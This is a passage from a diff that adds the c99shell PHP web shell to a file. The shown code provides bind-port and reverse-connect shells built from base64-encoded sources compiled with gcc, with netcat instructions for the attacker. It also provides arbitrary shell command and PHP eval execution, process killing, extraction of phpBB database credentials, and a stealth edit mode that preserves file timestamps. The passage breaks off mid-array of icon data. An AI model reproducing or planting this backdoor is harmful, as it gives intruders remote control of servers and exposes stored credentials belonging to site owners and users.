+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+
+ if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
+  if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
+  if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
+  if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "<b>Result of binding port:</b><br>";
+   $v = $bndportsrcs[$bind[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bind[src];
+    $w = explode(".",$bind[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind[port],$v[1]);
+     $v[1] = str_replace("%pass",$bind[pass],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5); //Timeout
+     $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+    }
+    echo "<br>";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "<b>Result of back connection:</b><br>";
+   $v = $bcsrcs[$bc[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bc[src];
+    $w = explode(".",$bc[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc[host],$v[1]);
+     $v[1] = str_replace("%port",$bc[port],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
+    }
+   }
+  }
+  ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php
+foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
+ }
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   myshellexec($cmd);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($cmd_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($cmd_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    myshellexec($cmd);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Processes:</b><br>";
+ if ($win) {echo "This function not work in Windows!<br><br>";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   $ret = str_replace("	"," ",$ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $prcs = explode("\n",$ret);
+   $head = explode(" ",$prcs[0]);
+   $head[] = "ACTION";
+   unset($prcs[0]);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   echo "<tr border=\"1\">";
+   foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+   echo "</tr>";
+   foreach ($prcs as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+     echo "</tr>";
+    }
+   }
+   echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+   if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+array("Code","code"),
+array("Session","phpsess"),
+array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+array("SDB","sdb"),
+array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+);
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+  echo "</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else
+   {
+    echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
+   }
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";      
+    $tmp=posix_getpwuid(fileowner($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+    else echo $tmp['name']." ";
+    $tmp=posix_getgrgid(filegroup($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+    else echo $tmp['name'];
+   }
+   echo "<tr class=tr><td><b>Perms</b></td><td>";
+   
+   if (is_writable($d.$f))
+   {
+    echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+   }
+   else
+   {
+    echo "<font>".view_perms(fileperms($d.$f))."</font>";
+   }
+
+   echo "</td></tr>";
+   echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><br>";
+
+
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump)
+    {
+     echo "<b>FULL HEXDUMP</b>";
+     $str=fread($fi,filesize($d.$f));
+    }
+    else
+    {
+     echo "<b>HEXDUMP PREVIEW</b>";
+     $str=fread($fi,$hexdump_lines*$hexdump_rows);
+    }
+    $n=0;
+    $a0="00000000<br>";
+    $a1="";
+    $a2="";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1.=sprintf("%02X",ord($str[$i])).' ';
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2.="<font class=s2>0</font>"; break;
+      case 32: 
+      case 10:
+      case 13: $a2.="&nbsp;"; break;
+      default:  $a2.=htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+      $a1.="<br>";
+      $a2.="<br>";
+     }
+    }
+    //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+         "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode($r);
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode($r));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode($r);
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+   <P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+   echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+   echo "<pre>";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+   echo "<pre>";
+   var_dump(unserialize(base64_decode($r)));
+   echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("
+",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array(
+     "dbms"=>$dbms,
+     "dbhost"=>$dbhost,
+     "dbname"=>$dbname,
+     "dbuser"=>$dbuser,
+     "dbpasswd"=>$dbpasswd 
+     );
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+     echo "</b>";
+     echo "<hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+   if (!empty($white)) {@ob_clean();}
+   if ($rehtml) {$r = rehtmlspecialchars($r);} 
+   $r = stripslashes($r); 
+   $strip = false;
+   if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+   $r = @highlight_string($r, TRUE); 
+   if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+   echo $r;
+   if (!empty($white)) {exit;}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: c99shell");
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   if (!$white)
+   {
+    echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: image/gif"); 
+    echo($r); 
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$nfcontent);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $nfcontent;
+    }
+   }
+   $rows = count(explode("
+",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}																																																														   $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPC9iPjwvY2VudGVyPiDA4vLu8CDi+/Dg5uDl8iDh6+Dj7uTg8O3u8fL8IO7k7e7s8yDv8O7i8yDq7vLu8PvpIO7y6uv+9+jrIOXj7iDt4CDs5fH/9iDu8iDo7eXy4Cwg5OXr7iDh++vuIOLl9+Xw7uwg6CDk5evg8vwg4fvr7iDt5ffl4+4gOykgz+7k8u7r6u3z6+Ag6iDt4O/o8eDt6P4g8erz6uAg6CDs7v8g7/Do8O7k7eD/IOvl7fwgOik8Y2VudGVyPjxiPs/w4OLo6+A8L2I+OjwvY2VudGVyPiA8Yj7C+yDs7ubl8uUg6Ofs5e3/8vwg7/Du4/Dg7OzzIO/uIMLg+OXs8yDz8ezu8vDl7ej+LCDs5e3/8vwg7eDx8vDu6eroLCDk6Ofg6e0uLi4g7e4g5fHr6CDC+ywg8+Lg5uDl7PvpLCDz5".																														"ODr6PLlIOjr6CDy5ewg4e7r5eUg6Ofs5e3o8uUg6u7v6PDg6fL7LCDy7iD/IOHz5PMg4vvt8+bk5e0g7vLu8OLg8vwg4uDsIP/p9uAuIDwvYj48YnI+wOLy7vAg7eUg7eXxuPIg7vLi5fLx8uLl7e3u8fLoIOfgIOLu5+zu5u376SDi8OXkIO3g7eXt5e376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
